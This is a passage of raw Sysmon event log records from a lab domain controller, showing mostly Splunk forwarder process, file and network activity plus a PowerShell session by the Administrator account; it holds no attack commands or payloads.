Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002240753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.530{05ADC7E1-6DAC-603E-C3AA-00000000AD01}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002240752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48CCB2E9E16BA99B93D4D844D8E525FB,SHA256=59E99DBF70A12A8694DB760ABC743557B11FB3AC34EA60DD0E9B793F419E7AED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.217{05ADC7E1-6DAC-603E-C2AA-00000000AD01}108363096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002240750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D30D050BAF69827F66C0746C679972BD,SHA256=F132A7633E8606F763399EF5A949476CC4DD66F902DEF52432EFB380B3C2FBE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DE930F1BA3A5BD678541D2D8E81016F,SHA256=6E717609BA8AAC617CDD4F829733146A2F2811776FBB46E986FD058F336EE454,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DAC-603E-C2AA-00000000AD01}10836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DAC-603E-C2AA-00000000AD01}10836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.029{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DAC-603E-C2AA-00000000AD01}10836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002240741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:04.031{05ADC7E1-6DAC-603E-C2AA-00000000AD01}10836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002240763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:05.567{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2BA2AF30C4809CD8D99BFEF19B222D,SHA256=D06908F271526131E69CDACDBAC64BF868B1E20CC36B591A10DC4F94EAB29BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:05.065{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63896AC4DDDA6ECDE1CF075113652645,SHA256=BFF9B63D330448602CF4BC176E8B67356123333D348228F4F11774746EF5FFCD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:56.506{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56511- 23542300x80000000000000002240765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:06.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC788DA33FA36B2B199F4DD2F650D8DE,SHA256=BDB54D1543C756D6F297ABC5F90DC47A9A5A5B23512F6A5861A9C540230AB106,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:06.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C55338413A70F022AFC744DB8A51F82,SHA256=1096B3ED0B96AF4270E4C0ECC13483D23DB911F4980B8BB4675412E3073FB2AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:57.678{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51540- 354300x80000000000000002240770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:57.522{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56511- 354300x80000000000000002240769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:57.288{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60147-false10.0.1.12-8000- 23542300x80000000000000002240768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:07.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E43204CBA5966AE4666D2EC38685C341,SHA256=F2109F11D7A673D87D60B27DB5E0024040C87E24F9914493A5DDDFE08B99DFE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:07.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3EFE0F8779208CD23BFC061E9A28BB8E,SHA256=30FC2678D0D04940A15514545E14BBC491E3F2EE545BEDE98BA0CD9D354849B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:58.694{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51540- 23542300x80000000000000002240773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:08.654{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C946688CDAC69CF7C5AD2674BFE8CCD2,SHA256=8B0AB509DAB6203FF69BFC9C339BBB3C3F2549ABB9F29BA8441AA452BF0F785C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:08.564{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=796523B73F8C918AB34916A42CA02700,SHA256=075AD0AB6D441EB6F3E9E17227D98A14B1993517DE5B07F487E75F7740FA3D7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:09.673{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=961DA1736D55A2F76E4FEDF705F3FA50,SHA256=8088CDF8488F13AEB6878003A37EB581C0448DDC3990DAD8B14B8C6E7E946C24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:10.686{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13CAB223FDDFAE3FCF4F76A2DDEA615C,SHA256=DA3C90E48FB811DBEB122CBA7E86DB774522603DEF1648E4FB200DDD3833CDFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:11.972{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0DD404ECA4350E45BA0A7346651FF360,SHA256=01181D9619A645DBFA5D1C30665CB591A64D744FCE34B493A4A0009412E9AD1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:11.732{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=620D99660E676B046552B8D766C93850,SHA256=5656ECA602F9C79B472520680115A0A74B8E22751686CD1AF359F019B0EC3E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:12.748{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C793086C7D54FB70539080E9286A1EA1,SHA256=FD6F5E1AB613F3831BEFC8F160E0602869F304AFD3E8AE658BA22037C7177700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:12.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30ACA91B49B7F05F15EF4A5351D1884E,SHA256=6D560A97C62D3A70927ABB1B65DC5F77B05C06FC4E0F3EA7C402686369F7BD24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:13.767{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AEFAF6EF7EBD347A7661C660220AD30,SHA256=E28733E90EDA2C3B50D976287717068A56F714659CC798127AD857DEDCD31172,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.288{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60148-false10.0.1.12-8000- 23542300x80000000000000002240784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:14.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C93B910401745180CE3B4BA2099F7EF3,SHA256=F4B5259D3BF092CF06E6DFACB56810C7352DDEE9611A8EAEEA15B56926798089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:14.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70544C0F3375201C3EF8322BEA2A2830,SHA256=2B57AA4EF6E62414A4299C72FE27A0E6E02E15A632D7C0BCA667A5AC27D86344,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.826{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1960618F4AD97384BCA63898E8278400,SHA256=9050A71BB16CB87FEB84D409F69B8B1DA72DDFFF37A21261F6E240F67A73F7B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.654{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD8659AE5A61CA5405BFF0D023C83CF3,SHA256=8914A85FCF5B9D8DC3B45B02B10922ED1CC6386AB4EA37FDBC6BD580CA8CECCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.420{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.311{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.311{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.272{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 